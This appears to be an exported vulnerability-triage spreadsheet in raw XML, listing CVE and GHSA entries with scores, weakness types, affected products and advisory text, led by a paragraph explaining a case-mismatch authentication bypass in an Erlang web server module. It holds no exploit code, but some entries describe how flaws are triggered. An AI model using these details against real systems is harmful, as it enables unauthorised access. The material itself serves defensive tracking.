mod_auth:secret_path/3 decides whether a resolved filesystem path lies inside a protected directory block by running the configured directory path through re:run/3 without the caseless option. A request for /secret/file against a directory configured as /Secret therefore does not match, so the request is treated as unprotected and no authentication challenge is issued, while the filesystem resolves the differently cased path to the same file and mod_get serves it. Deployments on case-sensitive filesystems are unaffected, because there the filesystem itself rejects the mismatched casing.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627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73270</t></is></c></row><row r="628"><c r="A628" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B628" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C628" s="5" t="inlineStr"><is><t>CVE-2026-75538</t></is></c><c r="D628" s="5" t="n"><v>8.199999999999999</v></c><c r="E628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F628" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G628" s="5" t="inlineStr" /><c r="H628" s="5" t="n"><v>0.005</v></c><c r="I628" s="5" t="inlineStr" /><c r="J628" s="5" t="inlineStr" /><c r="K628" s="5" t="inlineStr" /><c r="L628" s="5" t="inlineStr" /><c r="M628" s="5" t="inlineStr" /><c r="N628" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O628" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P628" s="5" t="inlineStr" /><c r="Q628" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R628" s="5" t="inlineStr"><is><t>An attacker that connects to an open Erlang TCP port that uses the inet driver with {packet,4} mode can use a signed overflow in an incorrect packet length calculation to overflow the receive buffer into the VM allocator area and beyond up to about 2 GB.

This would easily trash the allocated block's allocator metadata footer, and the next block, if any, and most likely cause the BEAM VM to crash. Utilizing this with precision enough to achieve Remote Code Execution would be extremely unfeasible.

This issue affects OTP from OTP 17.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to erts from 6.0 before 15.2.7.13, from 16.0 before 16.4.0.6, and from 17.0 before 17.0.6. Whether OTP before OTP 17.0, corresponding to erts before 6.0, is affected is unknown.</t></is></c><c r="S628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75538</t></is></c></row><row r="629"><c r="A629" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B629" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C629" s="5" t="inlineStr"><is><t>CVE-2026-75594</t></is></c><c r="D629" s="5" t="n"><v>8.199999999999999</v></c><c r="E629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F629" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G629" s="5" t="inlineStr" /><c r="H629" s="5" t="n"><v>0.005</v></c><c r="I629" s="5" t="inlineStr" /><c r="J629" s="5" t="inlineStr"><is><t>nginx</t></is></c><c r="K629" s="5" t="inlineStr" /><c r="L629" s="5" t="inlineStr" /><c r="M629" s="5" t="inlineStr" /><c r="N629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O629" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P629" s="5" t="inlineStr" /><c r="Q629" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R629" s="5" t="inlineStr"><is><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is></c><c r="S629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75594</t></is></c></row><row r="630"><c r="A630" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C630" s="5" t="inlineStr"><is><t>CVE-2026-76191</t></is></c><c r="D630" s="5" t="n"><v>8.199999999999999</v></c><c r="E630" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F630" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G630" s="5" t="inlineStr" /><c r="H630" s="5" t="n"><v>0.003</v></c><c r="I630" s="5" t="inlineStr" /><c r="J630" s="5" t="inlineStr" /><c r="K630" s="5" t="inlineStr"><is><t>adobe:animate, apple:macos, microsoft:windows</t></is></c><c r="L630" s="5" t="inlineStr" /><c r="M630" s="5" t="inlineStr" /><c r="N630" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P630" s="5" t="inlineStr" /><c r="Q630" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R630" s="5" t="inlineStr"><is><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is></c><c r="S630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t></is></c></row><row r="631"><c r="A631" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C631" s="5" t="inlineStr"><is><t>CVE-2026-76202</t></is></c><c r="D631" s="5" t="n"><v>8.199999999999999</v></c><c r="E631" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F631" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G631" s="5" t="inlineStr" /><c r="H631" s="5" t="n"><v>0.004</v></c><c r="I631" s="5" t="inlineStr" /><c r="J631" s="5" t="inlineStr" /><c r="K631" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L631" s="5" t="inlineStr" /><c r="M631" s="5" t="inlineStr" /><c r="N631" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P631" s="5" t="inlineStr" /><c r="Q631" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R631"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S631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t></is></c></row><row r="632"><c r="A632" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C632" s="5" t="inlineStr"><is><t>CVE-2026-77097</t></is></c><c r="D632" s="5" t="n"><v>8.199999999999999</v></c><c r="E632" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F632" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G632" s="5" t="inlineStr" /><c r="H632" s="5" t="n"><v>0.003</v></c><c r="I632" s="5" t="inlineStr" /><c r="J632" s="5" t="inlineStr" /><c r="K632" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L632" s="5" t="inlineStr" /><c r="M632" s="5" t="inlineStr" /><c r="N632" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P632" s="5" t="inlineStr" /><c r="Q632" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R632" s="5" t="inlineStr"><is><t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="S632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t></is></c></row><row r="633"><c r="A633" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B633" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C633" s="5" t="inlineStr"><is><t>CVE-2026-77348</t></is></c><c r="D633" s="5" t="n"><v>8.199999999999999</v></c><c r="E633" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F633" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G633" s="5" t="inlineStr" /><c r="H633" s="5" t="n"><v>0.002</v></c><c r="I633" s="5" t="inlineStr" /><c r="J633" s="5" t="inlineStr" /><c r="K633" s="5" t="inlineStr" /><c r="L633" s="5" t="inlineStr" /><c r="M633" s="5" t="inlineStr" /><c r="N633" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O633" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P633" s="5" t="inlineStr" /><c r="Q633" s="5" t="inlineStr"><is><t>CWE-1188, CWE-441, CWE-918</t></is></c><c r="R633" s="5" t="inlineStr"><is><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is></c><c r="S633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77348</t></is></c></row><row r="634"><c r="A634" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B634" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C634" s="5" t="inlineStr"><is><t>CVE-2026-77634</t></is></c><c r="D634" s="5" t="n"><v>8.199999999999999</v></c><c r="E634" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F634" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G634" s="5" t="inlineStr" /><c r="H634" s="5" t="n"><v>0.003</v></c><c r="I634" s="5" t="inlineStr" /><c r="J634" s="5" t="inlineStr" /><c r="K634" s="5" t="inlineStr" /><c r="L634" s="5" t="inlineStr"><is><t>composer:cakephp/cakephp</t></is></c><c r="M634" s="5" t="inlineStr"><is><t>4.5.12, 4.6.5, 5.1.9, 5.2.14, 5.3.7</t></is></c><c r="N634" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O634" s="5" t="inlineStr" /><c r="P634" s="5" t="inlineStr" /><c r="Q634" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R634" s="5" t="inlineStr"><is><t>### Impact

Custom mail headers added with `Message::setHeaders()` or `addHeaders()` do not have CRLF replaced allowing header injection if user controlled data is added to message headers without stripping CRLF bytes.

### Patches
5.3.7, 5.2.14, 5.1.9, 4.6.5, 4.5.12 contain fixes for this issue.

### Workarounds
You can strip CRLF bytes from email header values before setting header values.</t></is></c><c r="S634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77634</t></is></c></row><row r="635"><c r="A635" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B635" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C635" s="5" t="inlineStr"><is><t>CVE-2026-77641</t></is></c><c r="D635" s="5" t="n"><v>8.199999999999999</v></c><c r="E635" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F635" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G635" s="5" t="inlineStr" /><c r="H635" s="5" t="n"><v>0.002</v></c><c r="I635" s="5" t="inlineStr" /><c r="J635" s="5" t="inlineStr" /><c r="K635" s="5" t="inlineStr"><is><t>torproject:tor</t></is></c><c r="L635" s="5" t="inlineStr" /><c r="M635" s="5" t="inlineStr" /><c r="N635" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O635" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P635" s="5" t="inlineStr" /><c r="Q635" s="5" t="inlineStr"><is><t>CWE-252</t></is></c><c r="R635" s="5" t="inlineStr"><is><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is></c><c r="S635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77641</t></is></c></row><row r="636"><c r="A636" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C636" s="5" t="inlineStr"><is><t>CVE-2026-77968</t></is></c><c r="D636" s="5" t="n"><v>8.199999999999999</v></c><c r="E636" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F636" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G636" s="5" t="inlineStr" /><c r="H636" s="5" t="n"><v>0.002</v></c><c r="I636" s="5" t="inlineStr" /><c r="J636" s="5" t="inlineStr" /><c r="K636" s="5" t="inlineStr" /><c r="L636" s="5" t="inlineStr" /><c r="M636" s="5" t="inlineStr" /><c r="N636" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P636" s="5" t="inlineStr" /><c r="Q636" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R636" s="5" t="inlineStr"><is><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is></c><c r="S636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t></is></c></row><row r="637"><c r="A637" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B637" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C637" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D637" s="5" t="n"><v>8.199999999999999</v></c><c r="E637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F637" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G637" s="5" t="inlineStr" /><c r="H637" s="5" t="n"><v>0.003</v></c><c r="I637" s="5" t="inlineStr" /><c r="J637" s="5" t="inlineStr" /><c r="K637" s="5" t="inlineStr" /><c r="L637" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M637" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N637" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O637" s="5" t="inlineStr" /><c r="P637" s="5" t="inlineStr" /><c r="Q637" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R637"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S637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="638"><c r="A638" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B638" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C638" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D638" s="5" t="n"><v>8.199999999999999</v></c><c r="E638" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F638" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G638" s="5" t="inlineStr" /><c r="H638" s="5" t="n"><v>0.003</v></c><c r="I638" s="5" t="inlineStr" /><c r="J638" s="5" t="inlineStr" /><c r="K638" s="5" t="inlineStr" /><c r="L638" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M638" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N638" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O638" s="5" t="inlineStr" /><c r="P638" s="5" t="inlineStr" /><c r="Q638" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R638"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S638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="639"><c r="A639" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C639" s="5" t="inlineStr"><is><t>CVE-2026-81354</t></is></c><c r="D639" s="5" t="n"><v>8.199999999999999</v></c><c r="E639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F639" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G639" s="5" t="inlineStr" /><c r="H639" s="5" t="n"><v>0.002</v></c><c r="I639" s="5" t="inlineStr" /><c r="J639" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K639" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t></is></c><c r="L639" s="5" t="inlineStr" /><c r="M639" s="5" t="inlineStr" /><c r="N639" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P639" s="5" t="inlineStr" /><c r="Q639" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R639" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t></is></c></row><row r="640"><c r="A640" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C640" s="5" t="inlineStr"><is><t>CVE-2026-81356</t></is></c><c r="D640" s="5" t="n"><v>8.199999999999999</v></c><c r="E640" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F640" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G640" s="5" t="inlineStr" /><c r="H640" s="5" t="n"><v>0.003</v></c><c r="I640" s="5" t="inlineStr" /><c r="J640" s="5" t="inlineStr" /><c r="K640" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L640" s="5" t="inlineStr" /><c r="M640" s="5" t="inlineStr" /><c r="N640" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P640" s="5" t="inlineStr" /><c r="Q640" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R640" s="5" t="inlineStr"><is><t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t></is></c></row><row r="641"><c r="A641" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C641" s="5" t="inlineStr"><is><t>CVE-2026-81357</t></is></c><c r="D641" s="5" t="n"><v>8.199999999999999</v></c><c r="E641" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F641" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G641" s="5" t="inlineStr" /><c r="H641" s="5" t="n"><v>0.003</v></c><c r="I641" s="5" t="inlineStr" /><c r="J641" s="5" t="inlineStr" /><c r="K641" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L641" s="5" t="inlineStr" /><c r="M641" s="5" t="inlineStr" /><c r="N641" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P641" s="5" t="inlineStr" /><c r="Q641" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R641" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t></is></c></row><row r="642"><c r="A642" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C642" s="5" t="inlineStr"><is><t>CVE-2026-81378</t></is></c><c r="D642" s="5" t="n"><v>8.199999999999999</v></c><c r="E642" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F642" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G642" s="5" t="inlineStr" /><c r="H642" s="5" t="n"><v>0.003</v></c><c r="I642" s="5" t="inlineStr" /><c r="J642" s="5" t="inlineStr" /><c r="K642" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L642" s="5" t="inlineStr" /><c r="M642" s="5" t="inlineStr" /><c r="N642" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P642" s="5" t="inlineStr" /><c r="Q642" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="R642" s="5" t="inlineStr"><is><t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t></is></c></row><row r="643"><c r="A643" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C643" s="5" t="inlineStr"><is><t>CVE-2026-81379</t></is></c><c r="D643" s="5" t="n"><v>8.199999999999999</v></c><c r="E643" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F643" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G643" s="5" t="inlineStr" /><c r="H643" s="5" t="n"><v>0.003</v></c><c r="I643" s="5" t="inlineStr" /><c r="J643" s="5" t="inlineStr" /><c r="K643" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L643" s="5" t="inlineStr" /><c r="M643" s="5" t="inlineStr" /><c r="N643" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P643" s="5" t="inlineStr" /><c r="Q643" s="5" t="inlineStr"><is><t>CWE-636</t></is></c><c r="R643" s="5" t="inlineStr"><is><t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t></is></c></row><row r="644"><c r="A644" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B644" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C644" s="5" t="inlineStr"><is><t>CVE-2026-82262</t></is></c><c r="D644" s="5" t="n"><v>8.199999999999999</v></c><c r="E644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F644" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G644" s="5" t="inlineStr" /><c r="H644" s="5" t="n"><v>0.003</v></c><c r="I644" s="5" t="inlineStr" /><c r="J644" s="5" t="inlineStr" /><c r="K644" s="5" t="inlineStr" /><c r="L644" s="5" t="inlineStr" /><c r="M644" s="5" t="inlineStr" /><c r="N644" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O644" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P644" s="5" t="inlineStr" /><c r="Q644" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R644" s="5" t="inlineStr"><is><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is></c><c r="S644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82262</t></is></c></row><row r="645"><c r="A645" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B645" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C645" s="5" t="inlineStr"><is><t>CVE-2026-82263</t></is></c><c r="D645" s="5" t="n"><v>8.199999999999999</v></c><c r="E645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F645" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G645" s="5" t="inlineStr" /><c r="H645" s="5" t="n"><v>0.003</v></c><c r="I645" s="5" t="inlineStr" /><c r="J645" s="5" t="inlineStr" /><c r="K645" s="5" t="inlineStr" /><c r="L645" s="5" t="inlineStr" /><c r="M645" s="5" t="inlineStr" /><c r="N645" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O645" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P645" s="5" t="inlineStr" /><c r="Q645" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R645" s="5" t="inlineStr"><is><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is></c><c r="S645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82263</t></is></c></row><row r="646"><c r="A646" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B646" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C646" s="5" t="inlineStr"><is><t>CVE-2026-82728</t></is></c><c r="D646" s="5" t="n"><v>8.199999999999999</v></c><c r="E646" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F646" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G646" s="5" t="inlineStr" /><c r="H646" s="5" t="n"><v>0.005</v></c><c r="I646" s="5" t="inlineStr" /><c r="J646" s="5" t="inlineStr" /><c r="K646" s="5" t="inlineStr" /><c r="L646" s="5" t="inlineStr" /><c r="M646" s="5" t="inlineStr" /><c r="N646" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O646" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P646" s="5" t="inlineStr" /><c r="Q646" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R646" s="5" t="inlineStr"><is><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is></c><c r="S646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82728</t></is></c></row><row r="647"><c r="A647" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B647" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C647" s="5" t="inlineStr"><is><t>CVE-2026-83939</t></is></c><c r="D647" s="5" t="n"><v>8.199999999999999</v></c><c r="E647" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F647" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G647" s="5" t="inlineStr" /><c r="H647" s="5" t="n"><v>0.003</v></c><c r="I647" s="5" t="inlineStr" /><c r="J647" s="5" t="inlineStr" /><c r="K647" s="5" t="inlineStr"><is><t>microsoft:windows_11_26h1</t></is></c><c r="L647" s="5" t="inlineStr" /><c r="M647" s="5" t="inlineStr" /><c r="N647" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O647" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P647" s="5" t="inlineStr" /><c r="Q647" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R647" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S647" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t></is></c></row><row r="648"><c r="A648" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B648" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C648" s="5" t="inlineStr"><is><t>CVE-2026-86600</t></is></c><c r="D648" s="5" t="n"><v>8.199999999999999</v></c><c r="E648" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F648" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G648" s="5" t="inlineStr" /><c r="H648" s="5" t="n"><v>0.003</v></c><c r="I648" s="5" t="inlineStr" /><c r="J648" s="5" t="inlineStr" /><c r="K648" s="5" t="inlineStr" /><c r="L648" s="5" t="inlineStr" /><c r="M648" s="5" t="inlineStr" /><c r="N648" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O648" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P648" s="5" t="inlineStr" /><c r="Q648" s="5" t="inlineStr"><is><t>CWE-441, CWE-522</t></is></c><c r="R648" s="5" t="inlineStr"><is><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is></c><c r="S648" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t></is></c></row><row r="649"><c r="A649" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B649" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C649" s="5" t="inlineStr"><is><t>GHSA-qp76-pq9f-gr9m</t></is></c><c r="D649" s="5" t="n"><v>8.199999999999999</v></c><c r="E649" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F649" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G649" s="5" t="inlineStr" /><c r="H649" s="5" t="inlineStr" /><c r="I649" s="5" t="inlineStr" /><c r="J649" s="5" t="inlineStr" /><c r="K649" s="5" t="inlineStr" /><c r="L649" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M649" s="5" t="inlineStr" /><c r="N649" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O649" s="5" t="inlineStr" /><c r="P649" s="5" t="inlineStr" /><c r="Q649" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R649" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-568f-pv23-39p4. This link is maintained to preserve external references.

## Original Description
NLTK versions before 3.10.0 contain a path traversal vulnerability in FramenetCorpusReader and NKJPCorpusReader that allows attackers to parse XML files outside the corpus root by supplying unsafe selectors or poisoned index state. Attackers can exploit frame_by_name, doc, lu, and header methods with crafted parameters to read arbitrary XML files accessible to the application.</t></is></c><c r="S649" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-qp76-pq9f-gr9m</t></is></c></row><row r="650"><c r="A650" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B650" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C650" s="5" t="inlineStr"><is><t>CVE-2026-19219</t></is></c><c r="D650" s="5" t="n"><v>8.1</v></c><c r="E650" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F650" s="5" t="inlineStr"><is><t>security@progress.com</t></is></c><c r="G650" s="5" t="inlineStr" /><c r="H650" s="5" t="n"><v>0.002</v></c><c r="I650" s="5" t="inlineStr" /><c r="J650" s="5" t="inlineStr" /><c r="K650" s="5" t="inlineStr" /><c r="L650" s="5" t="inlineStr" /><c r="M650" s="5" t="inlineStr" /><c r="N650" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O650" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P650" s="5" t="inlineStr" /><c r="Q650" s="5" t="inlineStr"><is><t>CWE-345, CWE-434</t></is></c><c r="R650" s="5" t="inlineStr"><is><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is></c><c r="S650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19219</t></is></c></row><row r="651"><c r="A651" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C651" s="5" 